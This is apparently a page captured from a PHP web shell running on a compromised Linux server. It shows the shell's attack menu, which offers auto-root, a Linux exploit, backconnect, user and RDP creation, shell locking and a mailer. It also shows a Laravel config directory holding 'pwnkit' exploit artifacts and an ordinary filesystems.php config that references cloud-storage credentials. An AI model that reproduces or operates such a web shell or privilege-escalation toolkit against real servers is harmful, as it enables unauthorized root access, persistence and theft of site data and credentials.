Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
8.05
KB
-rw-rw-rw-
auth.php
4.21
KB
-rw-rw-rw-
backup.php
9.88
KB
-rw-rw-rw-
broadcasting.php
2.04
KB
-rw-rw-rw-
cache.php
3.2
KB
-rw-rw-rw-
cors.php
846
B
-rw-rw-rw-
database.php
6.43
KB
-rw-rw-rw-
datatables.php
4.02
KB
-rw-rw-rw-
debugbar.php
11.39
KB
-rw-rw-rw-
dompdf.php
11.21
KB
-rw-rw-rw-
filesystems.php
3.24
KB
-rw-rw-rw-
hashing.php
1.54
KB
-rw-rw-rw-
logging.php
3.7
KB
-rw-rw-rw-
mail.php
3.69
KB
-rw-rw-rw-
permission.php
5.45
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.84
KB
-rw-rw-rw-
sanctum.php
2.24
KB
-rw-rw-rw-
services.php
979
B
-rw-rw-rw-
session.php
6.86
KB
-rw-rw-rw-
sweetalert.php
9.34
KB
-rw-rw-rw-
view.php
1.03
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filesystems.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DISK', 'local'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been set up for each driver as an example of the required values. | | Supported Drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => storage_path('app'), 'throw' => false, ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', 'throw' => false, ], 'google' => [ 'driver' => 'google', 'clientId' => env('GOOGLE_DRIVE_CLIENT_ID'), 'clientSecret' => env('GOOGLE_DRIVE_CLIENT_SECRET'), 'refreshToken' => env('GOOGLE_DRIVE_REFRESH_TOKEN'), 'folder' => env('GOOGLE_DRIVE_FOLDER'), // without folder is root of drive or team drive //'teamDriveId' => env('GOOGLE_DRIVE_TEAM_DRIVE_ID'), ], // you can use more accounts, only add more disks and configs on .env // also you can use the same account and point to a diferent folders for each disk /*'second_google' => [ 'driver' => 'google', 'clientId' => env('SECOND_GOOGLE_DRIVE_CLIENT_ID'), 'clientSecret' => env('SECOND_GOOGLE_DRIVE_CLIENT_SECRET'), 'refreshToken' => env('SECOND_GOOGLE_DRIVE_REFRESH_TOKEN'), 'folder' => env('SECOND_GOOGLE_DRIVE_FOLDER'), ],*/ 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), 'use_path_style_endpoint' => env('AWS_USE_PATH_STYLE_ENDPOINT', false), 'throw' => false, ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];
Close